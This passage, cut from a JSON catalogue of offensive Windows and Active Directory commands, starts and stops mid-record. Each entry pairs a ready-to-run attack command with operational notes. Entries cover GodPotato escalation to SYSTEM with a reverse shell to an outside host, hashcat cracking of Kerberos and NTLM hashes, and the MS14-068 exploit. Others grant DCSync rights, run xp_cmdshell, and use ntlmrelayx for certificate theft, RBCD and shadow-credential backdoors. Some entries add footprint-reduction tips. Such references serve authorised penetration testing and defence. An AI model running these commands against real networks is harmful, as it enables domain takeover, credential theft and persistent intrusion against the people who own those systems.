\\pipe\\efsrpc","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:GodPotato-SeImpersonate","toolId":"wadcoms:GodPotato","toolName":"GodPotato","name":"GodPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Run a command as NT AUTHORITY\\SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c whoami\"\n\n# Example: trigger a reverse shell payload as SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c C:\\Windows\\Temp\\rev.exe 10.10.10.2 443\"","description":"GodPotato abuses SeImpersonatePrivilege to escalate a service account to SYSTEM by triggering a SYSTEM RPC/DCOM authentication against a local fake OXID resolver, then impersonating the returned token. Unlike the older *Potato variants it works broadly across Windows Server 2012 R2 through 2022 and Windows 8 through 11. Pick the binary matching the installed .NET runtime (GodPotato-NET2/NET35/NET4). Requires SeImpersonatePrivilege or SeAssignPrimaryToken on the current token.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":["T1134.002"],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"added":true},{"id":"wadcoms:Hashcat-ASREPRoast","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-ASREPRoast","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5asrep$23$user@TEST.LOCAL:... blob per account\nhashcat -m 18200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 18200 hashes.txt --show","description":"Accounts with 'Do not require Kerberos preauthentication' set will return an AS-REP whose encrypted part is derived from the account password. Hashcat mode 18200 cracks the RC4-HMAC (etype 23) $krb5asrep$23$ format produced by Impacket GetNPUsers.py or Rubeus asreproast. No valid domain credentials are needed to collect these, and cracking is fully offline against a wordlist.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.004"],"requires":["Hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/"],"added":true},{"id":"wadcoms:Hashcat-DCC2-mscash2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-DCC2-mscash2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $DCC2$10240#john#<hash> line per cached account\nhashcat -m 2100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 2100 hashes.txt --show","description":"Domain Cached Credentials v2 (mscash2 / DCC2) are the cached logon verifiers stored on domain-joined hosts so users can log in when the DC is unreachable, recoverable with secretsdump.py or mimikatz. Hashcat mode 2100 cracks the $DCC2$iterations#username#hash format. DCC2 uses PBKDF2 (default 10240 iterations) and cannot be passed or relayed, so offline cracking is the only path to the password; expect it to be far slower than NTLM.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.005"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/"],"added":true},{"id":"wadcoms:Hashcat-Kerberoast-TGSREP","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-Kerberoast-TGSREP","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5tgs$23$*...*$... blob per SPN\nhashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# recover already-cracked results from the potfile\nhashcat -m 13100 hashes.txt --show","description":"Kerberoasting returns a TGS-REP whose encrypted portion is derived from the service account's password. Hashcat mode 13100 targets the RC4-HMAC (etype 23) $krb5tgs$23$ format produced by Impacket GetUserSPNs.py or Rubeus. Because the ticket is keyed to the account password, it can be recovered fully offline with a wordlist, no further contact with the DC and no lockout risk. This is the standard follow-up to any Kerberoast collection.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.003"],"requires":["Hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/"],"added":true},{"id":"wadcoms:Hashcat-NetNTLMv1","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# straight dictionary crack of the NetNTLMv1 response\nhashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# preferred: reverse a fixed-challenge (1122334455667788) response to the NT hash\n# format it with evilmog's ntlmv1-multi, then submit to crack.sh / crack DES locally\npython3 ntlmv1.py --ntlmv1 'john::TEST:...:...:1122334455667788'","description":"Legacy NetNTLMv1 responses (user::domain:LMresp:NTresp:challenge) are cracked with hashcat mode 5500. Their real value is that a NetNTLMv1 response captured against a known/forced challenge (e.g. 1122334455667788) is a DES computation over the raw NT hash, so it can be reversed to the account's NT hash rather than a password. The evilmog ntlmv1-multi tool formats the response for submission to crack.sh, which historically returned the NT hash instantly via DES rainbow tables (the public service has since been offline; the same reversal can be run locally as hashcat mode 14000 DES). The recovered NT hash then enables pass-the-hash.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":[],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/"],"added":true},{"id":"wadcoms:Hashcat-NetNTLMv2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one JOHN::TEST:112233...:HMAC:blob line per capture\nhashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 5600 hashes.txt --show","description":"Responder, ntlmrelayx or an SMB/HTTP poisoning capture yields NetNTLMv2 challenge-response hashes in the form user::domain:challenge:HMAC:blob. Hashcat mode 5600 cracks these offline to recover the account's cleartext password. NetNTLMv2 cannot be passed-the-hash, so cracking (or relaying) is the only way to weaponise a captured response.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/"],"added":true},{"id":"wadcoms:Hashcat-NTLM-secretsdump","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NTLM-secretsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# feed the full secretsdump pwdump line and let hashcat strip the user field\nhashcat -m 1000 -a 0 --username hashes.txt /usr/share/wordlists/rockyou.txt\n\n# or crack a bare NT hash\nhashcat -m 1000 -a 0 2a3de7fe356ee524cc9f3d579f2e0aa7 /usr/share/wordlists/rockyou.txt\n\nhashcat -m 1000 --username hashes.txt --show","description":"Impacket secretsdump.py, an NTDS.dit dump or a SAM dump yields lines of the form user:rid:lmhash:nthash:::. Hashcat mode 1000 cracks the raw NT hash to cleartext. The --username flag lets hashcat parse the full pwdump-style line and keep the account association in the output. Cracking is optional for lateral movement (NT hashes can be passed) but is needed to recover reusable passwords and to spot password reuse.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tNT Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.002"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"added":true},{"id":"wadcoms:Impacket-dacledit-DCSync","toolId":"wadcoms:Impacket-dacledit","toolName":"Impacket-dacledit","name":"Impacket-dacledit-DCSync","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Grant john DCSync rights on the domain object\ndacledit.py -action 'write' -rights 'DCSync' -principal 'john' -target-dn 'DC=test,DC=local' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's dacledit.py reads and modifies the DACL of an Active Directory object over LDAP. With `-action write -rights DCSync` against the domain naming context it grants a principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, enabling that principal to perform a DCSync and dump every domain hash. This is a classic ACL-based domain-privilege-escalation and persistence primitive; it requires WriteDacl over the domain object. Back up the DACL with `-action read` first so you can restore it.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:Impacket-DescribeTicket","toolId":"wadcoms:Impacket-describeTicket","toolName":"Impacket-describeTicket","name":"Impacket-DescribeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Describe a ticket offline (envelope, flags, and the PAC where it can be read)\ndescribeTicket.py out.ccache","description":"Impacket describeTicket.py parses a Kerberos ticket file (ccache or kirbi) and prints its fields, and when given the relevant key it decrypts the enc-part and dumps the PAC, exposing the user, RID, group memberships and PAC signatures. It is the Linux counterpart to Rubeus describe and is useful for validating forged or captured tickets before use. Runs fully offline.\n\nCommand Reference:\n\n\tTicket file: out.ccache","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Impacket-FindDelegation","toolId":"wadcoms:Impacket-findDelegation","toolName":"Impacket-findDelegation","name":"Impacket-FindDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate all delegation relationships in the domain\nfindDelegation.py test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket findDelegation.py enumerates every delegation relationship in the domain over LDAP: unconstrained, constrained (S4U2Proxy allowed-to-delegate-to targets) and resource-based constrained delegation. The output identifies accounts and computers that can be abused for privilege escalation and lateral movement via Kerberos delegation. Requires any valid domain credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"added":true},{"id":"wadcoms:Impacket-GetUserSPNs-NoPreauth","toolId":"wadcoms:Impacket-GetUserSPNs","toolName":"Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs-NoPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Credential Access"],"nativeCategory":["Enumeration","Credential Access"],"command":"# 'john' is an account with Kerberos pre-auth disabled; usernames.txt lists SPN accounts to roast\nGetUserSPNs.py -no-preauth john -usersfile usernames.txt -dc-host dc.test.local test.local/","description":"GetUserSPNs.py with -no-preauth performs Kerberoasting without any valid domain credentials. It leverages an account that has Kerberos pre-authentication disabled (an AS-REP roastable account): by altering the sname in a crafted KRB_AS_REQ, the KDC returns a service ticket instead of a TGT, encrypted with the target service account's key. Because you cannot query LDAP for SPNs without creds, you must supply candidate service-account names with -usersfile. The resulting TGS hashes are cracked offline. You only need the name of one pre-auth-disabled account plus a list of accounts to roast.\n\nCommand Reference:\n\n\tNo_Creds (name of an AS-REP roastable account: john)\n\tCandidate accounts file: usernames.txt\n\tDomain: test.local\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["No_Creds"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true},{"id":"wadcoms:Impacket-GoldenPac","toolId":"wadcoms:Impacket-goldenPac","toolName":"Impacket-goldenPac","name":"Impacket-GoldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Lateral Movement"],"nativeCategory":["PrivEsc","Exploitation","Lateral Movement"],"command":"# Exploit MS14-068 to gain SYSTEM on an unpatched DC\ngoldenPac.py test.local/john:password123@dc.test.local","description":"Impacket goldenPac.py exploits MS14-068 (CVE-2014-6324): on an unpatched domain controller the PAC signature validation can be bypassed, letting an ordinary domain user forge a TGT claiming Domain Admin membership without the krbtgt key. The script builds the forged PAC, obtains a privileged ticket and then executes a command (PSEXEC-style) on the target DC. Only affects DCs missing the 2014 patch, but remains relevant against legacy lab and CTF environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller host: dc.test.local","mitre":["T1558"],"requires":["Username","Password"],"services":["Kerberos","SMB"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Impacket-MSSQLClient","toolId":"wadcoms:Impacket-mssqlclient","toolName":"Impacket-mssqlclient","name":"Impacket-MSSQLClient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Lateral Movement","Enumeration"],"nativeCategory":["Lateral Movement","Enumeration"],"command":"# SQL authentication (mixed-mode / sa account)\nmssqlclient.py test.local/john:password123@10.10.10.1\n\n# Windows (domain) authentication over NTLM\nmssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# Pass-the-hash with Windows auth\nmssqlclient.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 test.local/john@10.10.10.1 -windows-auth","description":"mssqlclient.py from Impacket opens an interactive TDS session against a Microsoft SQL Server. It supports plain SQL logins (the local sa or a mixed-mode account) as well as Windows/domain authentication via -windows-auth, which forces NTLM instead of SQL auth. Pass-the-hash works by supplying -hashes LMHASH:NTHASH instead of a password. Use it as the entry point for all further MSSQL abuse (enumeration, xp_cmdshell, linked servers).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql"],"added":true},{"id":"wadcoms:Impacket-MSSQLClient-XPCmdShell","toolId":"wadcoms:Impacket-mssqlclient","toolName":"Impacket-mssqlclient","name":"Impacket-MSSQLClient-XPCmdShell","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"mssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# At the SQL> prompt:\nSQL> enable_xp_cmdshell\nSQL> xp_cmdshell whoami\nSQL> disable_xp_cmdshell","description":"Once connected with mssqlclient.py, the built-in enable_xp_cmdshell command flips the xp_cmdshell advanced option on (via sp_configure), and xp_cmdshell then runs arbitrary OS commands as the SQL Server service account. This requires sysadmin (or equivalent) on the instance. Disable it again with disable_xp_cmdshell to reduce footprint; enabling xp_cmdshell is noisy and commonly alerted on.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql/execution"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-AddComputer","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-AddComputer","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"# Create a new computer account via the relayed session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --add-computer 'ATTACKER$' 'password123'","description":"Impacket's ntlmrelayx.py relays authentication to LDAPS and, with --add-computer, creates a new attacker-controlled computer account in the directory. This abuses the default MachineAccountQuota of 10, which permits any authenticated domain user to add computer objects. The freshly created account (with a known password) becomes a foothold for follow-on RBCD or Shadow Credentials attacks. If a computername and password are omitted, ntlmrelayx generates a random machine name and password and prints them. LDAPS is required because adding a computer with a password sets attributes that the DC only permits over a signed/sealed channel.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tNew computer account: ATTACKER$\n\n\tPassword: password123","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-DumpLAPS-ADCS","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-DumpLAPS-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery","Credential Access","Enumeration"],"nativeCategory":["Discovery","Credential Access","Enumeration"],"command":"# Dump LAPS passwords and enumerate AD CS via the relayed LDAP session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --dump-laps --dump-adcs","description":"Impacket's ntlmrelayx.py can leverage a relayed LDAP session for reconnaissance instead of a direct attack. --dump-laps reads and prints any LAPS-managed local administrator passwords (ms-Mcs-AdmPwd) that the relayed identity is permitted to read, and --dump-adcs enumerates AD CS enrollment services and certificate templates to help identify ESC1-ESC8 misconfigurations. Both are low-noise post-relay actions useful for expanding access after coercing a user or computer to authenticate. The amount of data returned depends entirely on the relayed principal's read permissions.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-ESC8-ADCS","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-ESC8-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Relay coerced DC auth to AD CS web enrollment (ESC8)\npython3 ntlmrelayx.py -t http://ca.test.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication to the Active Directory Certificate Services (AD CS) web enrollment endpoint (certsrv), abusing ESC8. HTTP enrollment interfaces do not enforce channel binding by default, so a relayed machine or user authentication can request a certificate on behalf of the coerced account. When a Domain Controller's machine account is coerced (via PetitPotam or the printer bug) and relayed against the DomainController template, the resulting certificate authenticates as the DC and enables full domain compromise. The --adcs flag enables the attack and --template selects the certificate template (Machine/DomainController for computers, User for users). ntlmrelayx prints the issued certificate as a base64 PFX for use with PKINIT.\n\nCommand Reference:\n\n\tAD CS enrollment endpoint: http://ca.test.local/certsrv/certfnsh.asp\n\n\tTemplate: DomainController","mitre":[],"requires":["No_Creds"],"services":["NTLM","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-EscalateUser","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-EscalateUser","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant existing user 'john' DCSync rights via relayed privileged auth\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --escalate-user john","description":"Impacket's ntlmrelayx.py relays authentication from a privileged victim to LDAP/LDAPS and, with --escalate-user, grants the named existing user the ability to perform a DCSync by writing replication (Replicating Directory Changes) ACEs onto the domain object. This is used when you already control a low-privileged user account and can coerce a privileged principal (for example a Domain Admin session or a DC machine account) to authenticate to your relay. Unlike --add-computer, this modifies an existing account you already own rather than creating a new one, which is useful in environments where MachineAccountQuota is 0.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tUser to escalate: john","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-Interactive","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-Interactive","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Lateral Movement","Collection","Execution"],"nativeCategory":["Lateral Movement","Collection","Exploitation"],"command":"# Relay to SMB and open an interactive client shell\npython3 ntlmrelayx.py -t smb://10.10.10.1 -smb2support -i\n# In another terminal, connect to the spawned session\nnc 127.0.0.1 11000","description":"Impacket's ntlmrelayx.py can hold a relayed SMB session open and expose it as an interactive client rather than running a single command. With -i (--interactive), each successful relay spawns an interactive SMB shell bound to a local TCP port (starting at 11000); connect to it with netcat to browse shares, upload/download files, and read data as the relayed user. This is useful when you want hands-on access to the target's filesystem instead of blind command execution, and pairs with a coercion primitive (PetitPotam, printerbug, dementor) to feed authentications into the relay.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tLocal interactive port: 11000","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-RBCD","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-RBCD","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Relay coerced machine auth to LDAPS and configure RBCD on the victim object\n# (auto-creates a computer account to delegate from when you hold MachineAccountQuota)\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --delegate-access","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication from a victim computer to LDAPS on the Domain Controller. With --delegate-access it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the relayed computer object, granting an attacker-controlled account Resource-Based Constrained Delegation (RBCD) over it. After the relay, getST.py can request a Service Ticket impersonating any user (including a Domain Admin) to the victim. This requires an account to delegate to (create one first with --add-computer or Impacket's addcomputer.py) and a coercion primitive such as PetitPotam or the printer bug to force the victim's machine account to authenticate. LDAPS is preferred because RBCD writes require a channel not protected by LDAP signing.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tAttacker computer account: ATTACKER$","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-ShadowCredentials","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-ShadowCredentials","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Execution"],"nativeCategory":["Persistence","Credential Access","Exploitation"],"command":"# Add a Key Credential to the target account via relayed write access\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --shadow-credentials --shadow-target 'DC01$'","description":"Impacket's ntlmrelayx.py relays authentication to LDAP/LDAPS and, with --shadow-credentials, performs a Shadow Credentials attack by writing a new Key Credential into the target's msDS-KeyCredentialLink attribute. This adds an attacker-controlled certificate/key pair to the account, allowing later PKINIT authentication to obtain a TGT (and the account's NT hash via UnPAC-the-hash) without changing its password. --shadow-target selects which principal to backdoor; the relayed identity must have write access (GenericWrite/GenericAll) to that object. The attack requires the domain to support Key Trust (a KDC with PKINIT, i.e. an AD CS PKI or Server 2016+). ntlmrelayx saves the generated certificate so you can authenticate with it afterwards using gettgtpkinit.py or PKINITtools.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tShadow target account: DC01$","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true},{"id":"wadcoms:Impacket-owneredit","toolId":"wadcoms:Impacket-owneredit","toolName":"Impacket-owneredit","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Set john as the owner of the victim object\nowneredit.py -action 'write' -new-owner 'john' -target 'victim' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's owneredit.py reads or changes the owner set in an object's security descriptor over LDAP. Because the owner has implicit WriteDacl, `-action write -new-owner` lets you seize ownership of a target you hold WriteOwner over, then combine it with dacledit.py to grant yourself full control. Use `-action read` first to record the original owner for cleanup. Together owneredit + dacledit reproduce the WriteOwner-to-takeover chain on Linux.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew owner: john\n\n\tTarget object: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:Impacket-RaiseChild","toolId":"wadcoms:Impacket-raiseChild","toolName":"Impacket-raiseChild","name":"Impacket-RaiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Escalate from child-domain admin to forest root via ExtraSid golden ticket\nraiseChild.py test.local/john:password123","description":"Impacket raiseChild.py automates child-domain-to-forest-root privilege escalation by abusing the intra-forest trust. Given Domain Admin credentials in a child domain it DCSyncs the child krbtgt, forges a golden ticket with an Enterprise Admins ExtraSid from the forest root, and uses it to compromise the parent, optionally executing a command on the root DC. Requires child-domain administrative credentials.\n\nCommand Reference:\n\n\tChild domain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"added":true},{"id":"wadcoms:Impacket-TicketConverter","toolId":"wadcoms:Impacket-ticketConverter","toolName":"Impacket-ticketConverter","name":"Impacket-TicketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Defense Evasion"],"nativeCategory":["Collection","Defense Evasion"],"command":"# kirbi -> ccache (for Impacket)\nticketConverter.py ticket.kirbi out.ccache\n\n# ccache -> kirbi (for Rubeus/Mimikatz)\nticketConverter.py out.ccache ticket.kirbi","description":"Impacket ticketConverter.py converts between the .kirbi format (used by Mimikatz and Rubeus) and the .ccache format (used by Impacket and MIT Kerberos), in either direction, based on the input file extension. This bridges Windows and Linux tooling: dump a TGT with Rubeus, convert it, and 